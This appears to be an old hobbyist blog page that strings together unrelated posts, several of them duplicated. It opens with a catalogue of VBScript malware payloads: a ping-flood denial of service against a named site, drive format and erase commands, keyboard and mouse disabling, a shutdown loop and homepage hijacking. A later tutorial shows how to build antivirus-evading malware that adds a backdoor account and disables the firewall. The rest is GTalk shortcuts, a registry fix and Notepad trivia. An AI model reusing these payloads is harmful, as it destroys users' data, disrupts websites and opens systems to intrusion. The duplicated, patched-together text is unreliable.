--------Loop floppy disk read--------
Description: This payloads has to be one of the most annoying
non-damaging payloads that I can think of. It simply makes the
floppy disk drive read at an infinate loop.
Here is the code:
-------------------------------------
On Error Resume Next
Set fso = CreateObject("Scripting.FileSystemObject")
Set DriveA = fso.GetDrive("A:")
Do
If DriveA.IsReady Then DiskReady = True
Loop
-------------------------------------
--------DoS (Denial of Service) attack---------
Description: This code basically Pingfloods a specific webpage,
Link, FTP or whatever. However, just one computer doing a Pingflood
will not cause much damage, but if at least 30 computers were doing it,
it would.
Here is the code:
-------------------------------------
On Error Resume Next
Set wsc = CreateObject("WScript.Shell")
wsc.Run "Ping.exe -t -l 916 www.azoogle.com", 0, False
-------------------------------------
--------Change IE (Internet Explorer) hoomepage--------
Description: This just changes the homepage of IE using the registry.
Here is the code0:
-------------------------------------
On Error Resume Next
Set wsc = CreateObject("WScript.Shell")
wsc.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page", "http://www.rrlf.de/"
-------------------------------------
--------File/Link execution loop---------
Decription: This code basically executes a File or web link on
a loop.
Here is the code:
-------------------------------------
On Error Resume Next
Set wsc = CreateObject("WScript.Shell")
Do
wsc.Run "http://www.rrlf.de/", 3, False
Loop
-------------------------------------
--------Change PC Owner name--------
You can change the computers
owner name by using the registry. By changing the owner name,
it would change the login name, user info, installation info, etc that
involves the computers owner name.
Here is the code:
-------------------------------------
On Error Resume Next
Set wsc = CreateObject("WScript.Shell")
wsc.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\RegisteredOwner", "Zed/[rRlf]"
-------------------------------------
--------Change PC Organization name---------
Decription: This is basically the same as the 'Change PC Owner'
component above.
Here is the code:
-------------------------------------
On Error Resume Next
Set wsc = CreateObject("WScript.Shell")
wsc.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\RegisteredOrganization", "Zed Australia"
-------------------------------------
--------Format loop--------
Description: This code writes a batch command to format the computer
on the next system boot.
Here is the code:
-------------------------------------
On Error Resume Next
Set fso = CreateObject("Scripting.FileSystemObject")
If fso.FileExists("C:\Autoexec.bat") Then
Set WriteFormat = fso.OpenTextFile("C:\Autoexec.bat", 8)
WriteFormat.WriteLine "Echo y | Format C:"
WriteFormat.Close
-------------------------------------
--------Drive C Erase--------
Description: Practically the same as the format loop, but it happens
on the execution of the code, which is far more dangerous.
Here is the code:
-------------------------------------
On Error Resume Next
Set fso = CreateObject("Scripting.FileSystemObject")
Set wsc = CreateObject("WScript.Shell")
Set WriteFormat2 = fso.CreateTextFile("C:\Angry.bat", True)
WriteFormat2.WriteLine "Deltree /y *.*"
WriteFormat2.Close
wsc.Run "C:\Angry.bat", 0, False
-------------------------------------
--------Disable Keyboard and/or Mouse---------
Description: Really annoying, just uses the registry to disable the
Keyboard and/or Mouse.
Here is the code:
-------------------------------------
On Error Resume Next
Set wsc = CreateObject("WScript.Shell")
RegServ = "HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices"
wsc.RegWrite RegServ & "\DisableKeybaord", "Rundll32.exe Keyboard,Disable"
wsc.RegWrite RegServ & "\DisableMouse", "Rundll32.exe Mouse,Disable"
-------------------------------------
--------Shut down loop--------
Decription: Just keeps shutting down the computer when windows starts
(very annoying).
Here is the code:
-------------------------------------
On Error Resume Next
Set wsc = CreateObject("WScript.Shell")
wsc.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices\ShutDownWindows", "Rundll32.exe User,ExitWindows"
-------------------------------------
Saturday, March 28, 2009
TO ENABLE REGEDIT WHICH HAS BEEN DISABLED BY VIRUS
Copy Dis Code In A Notepad
[version]
signature=$chicago$
[defaultinstall]
delreg=regedit
[regedit]
HKCU,Software\Microsoft\Windows\CurrentVersion\Policies\System,"DisableRegistryTools"
HKLM,Software\Microsoft\Windows\CurrentVersion\Policies\System,"DisableRegistryTools"
[End]
Go To File>Save As...>
And Save It As Enable regedit.inf
Then Right Click On the Saved file and Select Install
[version]
signature=$chicago$
[defaultinstall]
delreg=regedit
[regedit]
HKCU,Software\Microsoft\Windows\CurrentVersion\Policies\System,"DisableRegistryTools"
HKLM,Software\Microsoft\Windows\CurrentVersion\Policies\System,"DisableRegistryTools"
[End]
Go To File>Save As...>
And Save It As Enable regedit.inf
Then Right Click On the Saved file and Select Install
GTALK TRICKS
Ctrl + E - It centralizes the selected text, or the current line.
Ctrl + R - It justifies to the right the selected text, or the current line.
Ctrl + L - It justifies to the left the selected text, or the current line.
Ctrl + I - The same thing does that Tab.
Tab - It is giving the area to each of the windows opened by Google Talk.
Ctrl + Tab - The same thing does that Shift + Tab .
Shift + Tab - The same thing does that Tab but in reverse.
Ctrl + Shift + L -Switch between points, numbers, letters, capital letters, roman numbers and capital roman numbers
Ctrl + 1 (KeyPad) - It does a simple space between the lines.
Ctrl + 2 (KeyPad) - It does a double space between the lines.
Ctrl + 5 (KeyPad) - A space does 1.5 between the lines.
Ctrl + 1 (NumPad) - It goes at the end of the last line.
Ctrl + 7 (NumPad) - It goes at the begin of the last line.
Ctrl + F4 - It closes the current window.
Alt + F4 - It closes the current window.
Alt + Esc - It Minimize all the windows.
Windows + ESC - Open Google Talk (if it's minimized, or in the tray)
F9 - Open Gmail to send an email to the current contact.
F11 - It initiates a telephonic call with your friend.
F12 - It cancels a telephonic call.
Esc - It closes the current window.
Ctrl + R - It justifies to the right the selected text, or the current line.
Ctrl + L - It justifies to the left the selected text, or the current line.
Ctrl + I - The same thing does that Tab.
Tab - It is giving the area to each of the windows opened by Google Talk.
Ctrl + Tab - The same thing does that Shift + Tab .
Shift + Tab - The same thing does that Tab but in reverse.
Ctrl + Shift + L -Switch between points, numbers, letters, capital letters, roman numbers and capital roman numbers
Ctrl + 1 (KeyPad) - It does a simple space between the lines.
Ctrl + 2 (KeyPad) - It does a double space between the lines.
Ctrl + 5 (KeyPad) - A space does 1.5 between the lines.
Ctrl + 1 (NumPad) - It goes at the end of the last line.
Ctrl + 7 (NumPad) - It goes at the begin of the last line.
Ctrl + F4 - It closes the current window.
Alt + F4 - It closes the current window.
Alt + Esc - It Minimize all the windows.
Windows + ESC - Open Google Talk (if it's minimized, or in the tray)
F9 - Open Gmail to send an email to the current contact.
F11 - It initiates a telephonic call with your friend.
F12 - It cancels a telephonic call.
Esc - It closes the current window.
CREATE A NEW UNDETECTABLE VIRUS IN 3 EASY STEPS
This article will demonstrate how an average PC user can create a piece of
malicious software in minutes that will be undetected by all the major
anti-malware scanning engines.
This article is for informational purposes only .
It is well-known in blackhat circles that a new piece of malware, coded from
scratch, will almost always bypass signature-based malware scanners. What is
less known is that the skill needed to do this is minimal at best - an average
user with no programming experience can cut and paste a few lines of code
together and create a undetected malicious executable in 3 easy steps.
Most anti-virus scanners rely on a database of signatures for known viruses.
Once a new virus is spread wide enough that it has been identified as malicious,
the anti-virus vendors scramble to come up with a fingerprint to identify that
strain of malware in the future. The obvious flaw in this process is that a new
piece of malware will bypass the scanners by default, until it is widespread
enough to be noticed by security researchers or picked up by a dummy node. There
is always a window of opportunity for new malware between the time of deployment.
Step 1: Commands to execute
Here we compile the DOS commands that our malware will execute into a DOS batch
file. As a simple proof of concept, let’s add a new user, disable the XP
firewall, and create a directory on the C drive.
@echo off
net user hacksafe hacksafe /add
net stop “Security Center”
net stop SharedAccess
netsh firewall set opmode mode=disable
mkdir c:\haxed
Save the above as a filename.bat
Step 2: Compile to an executable
Experienced DOS users may remember a number of utilities that were able to
convert a batch file into an executable (com or exe). These tools basically wrap
a shell call around each of our commands and bundle the whole thing up into a
tiny .exe file. One of the most well known is BAT2EXEC released by PC Magazine
in 1990.
creating our malware
Our tiny executable COM file is ready to go.
Step 3: Test and Deploy
We now have a custom executable that runs some obvoiusly malicious commands:
disabling the firewall and adding a new user. If we were to email this file to a
target, surely any modern anti-virus scanner would pick this up as a simple
batch file and alert us to the malicious code… right?
No patterns exist for this new piece of malware - it’s unrecognised by
signature-based scanners. Heuristics and sandboxing may alert to suspicious
activity, or email filtering may prevent our executable from reaching the
target, but the primary mechanism of anti-malware protection has been defeated
in a matter of seconds with little knowledge or skill on the part of the
attacker. If the target user were to run our executable, the only indication of
malicious activity would be a command prompt quickly appearing and disappearing
on the desktop.
Step 4 (Optional):
A typical malware author would take the created executable and mangle it in
various ways to make it harder to detect - using tools such as encrypters,
packers, scramblers and EXE binders. The malicious code may be bundled with a
legitimate executable, or packed with a rootkit or other remote access utility.
Example: Creating a simple dropper
A dropper is a small piece of malware designed to “drop” another peice of
malware onto a system. It usually comes in the form of a simple executable that,
when executed, retrieves a file from a hardcoded web or ftp site and executes it
(usually a rootkit or botnet suite).
malicious software in minutes that will be undetected by all the major
anti-malware scanning engines.
This article is for informational purposes only .
It is well-known in blackhat circles that a new piece of malware, coded from
scratch, will almost always bypass signature-based malware scanners. What is
less known is that the skill needed to do this is minimal at best - an average
user with no programming experience can cut and paste a few lines of code
together and create a undetected malicious executable in 3 easy steps.
Most anti-virus scanners rely on a database of signatures for known viruses.
Once a new virus is spread wide enough that it has been identified as malicious,
the anti-virus vendors scramble to come up with a fingerprint to identify that
strain of malware in the future. The obvious flaw in this process is that a new
piece of malware will bypass the scanners by default, until it is widespread
enough to be noticed by security researchers or picked up by a dummy node. There
is always a window of opportunity for new malware between the time of deployment.
Step 1: Commands to execute
Here we compile the DOS commands that our malware will execute into a DOS batch
file. As a simple proof of concept, let’s add a new user, disable the XP
firewall, and create a directory on the C drive.
@echo off
net user hacksafe hacksafe /add
net stop “Security Center”
net stop SharedAccess
netsh firewall set opmode mode=disable
mkdir c:\haxed
Save the above as a filename.bat
Step 2: Compile to an executable
Experienced DOS users may remember a number of utilities that were able to
convert a batch file into an executable (com or exe). These tools basically wrap
a shell call around each of our commands and bundle the whole thing up into a
tiny .exe file. One of the most well known is BAT2EXEC released by PC Magazine
in 1990.
creating our malware
Our tiny executable COM file is ready to go.
Step 3: Test and Deploy
We now have a custom executable that runs some obvoiusly malicious commands:
disabling the firewall and adding a new user. If we were to email this file to a
target, surely any modern anti-virus scanner would pick this up as a simple
batch file and alert us to the malicious code… right?
No patterns exist for this new piece of malware - it’s unrecognised by
signature-based scanners. Heuristics and sandboxing may alert to suspicious
activity, or email filtering may prevent our executable from reaching the
target, but the primary mechanism of anti-malware protection has been defeated
in a matter of seconds with little knowledge or skill on the part of the
attacker. If the target user were to run our executable, the only indication of
malicious activity would be a command prompt quickly appearing and disappearing
on the desktop.
Step 4 (Optional):
A typical malware author would take the created executable and mangle it in
various ways to make it harder to detect - using tools such as encrypters,
packers, scramblers and EXE binders. The malicious code may be bundled with a
legitimate executable, or packed with a rootkit or other remote access utility.
Example: Creating a simple dropper
A dropper is a small piece of malware designed to “drop” another peice of
malware onto a system. It usually comes in the form of a simple executable that,
when executed, retrieves a file from a hardcoded web or ftp site and executes it
(usually a rootkit or botnet suite).
Wednesday, March 25, 2009
NOTEPAD TRICKS
Notepad Trick !
Well quite old but here is the complete collection of notepad tricks.
Step 1: Open Notepad
Step 2: Write following line in the notepad.
this app can break
Step 3: Save this file as xxx.txt
Step 4: Close the notepad.
Step 5: Open the file again.
Voilla!!
or
Open a note pad
type Bush hid the facts
save that file,
close it
again open and see...
or
Open Notepad
Enter four words separated by spaces, wherein the first word has 4 letters, the next two have three letters, and the last word has five letters
DON'T hit enter at the end of the line.
Save the file.
Close Notepad.
Reopen Notepad.
Open the file you just saved.
WHY?
The reason this happens:
In notepad, any other 4-3-3-5 letter word combo will have the same results.
It is all to do with a limitation in Windows. Text files containing Unicode UTF-16-encoded Unicode are supposed to start with a "Byte-Order Mark" (BOM), which is a two-byte flag that tells a reader how the following UTF-16 data is encoded.
1) You are saving to 8-bit Extended ASCII (Look at the Save As / Encoding format)
2) You are reading from 16-bit UNICODE (You guessed it, look at the Save As / Encoding format)
This is why the 18 8-bit characters are being displayed as 9 (obviously not supported by your codepage) 16-bit UNICODE characters
~ cheers ~
NOTEPAD "world trade center trick"
Did you know that the flight number of the plane that had hit WTC ...on
9/11 was Q33N ....Open your Notepad in ur computer and type the flight
number i.e Q33N... Increase the Font Size to 72, Change the Font to
Wingdings. U will be amazed by the findings.
Well quite old but here is the complete collection of notepad tricks.
Step 1: Open Notepad
Step 2: Write following line in the notepad.
this app can break
Step 3: Save this file as xxx.txt
Step 4: Close the notepad.
Step 5: Open the file again.
Voilla!!
or
Open a note pad
type Bush hid the facts
save that file,
close it
again open and see...
or
Open Notepad
Enter four words separated by spaces, wherein the first word has 4 letters, the next two have three letters, and the last word has five letters
DON'T hit enter at the end of the line.
Save the file.
Close Notepad.
Reopen Notepad.
Open the file you just saved.
WHY?
The reason this happens:
In notepad, any other 4-3-3-5 letter word combo will have the same results.
It is all to do with a limitation in Windows. Text files containing Unicode UTF-16-encoded Unicode are supposed to start with a "Byte-Order Mark" (BOM), which is a two-byte flag that tells a reader how the following UTF-16 data is encoded.
1) You are saving to 8-bit Extended ASCII (Look at the Save As / Encoding format)
2) You are reading from 16-bit UNICODE (You guessed it, look at the Save As / Encoding format)
This is why the 18 8-bit characters are being displayed as 9 (obviously not supported by your codepage) 16-bit UNICODE characters
~ cheers ~
NOTEPAD "world trade center trick"
Did you know that the flight number of the plane that had hit WTC ...on
9/11 was Q33N ....Open your Notepad in ur computer and type the flight
number i.e Q33N... Increase the Font Size to 72, Change the Font to
Wingdings. U will be amazed by the findings.
Subscribe to:
Posts (Atom)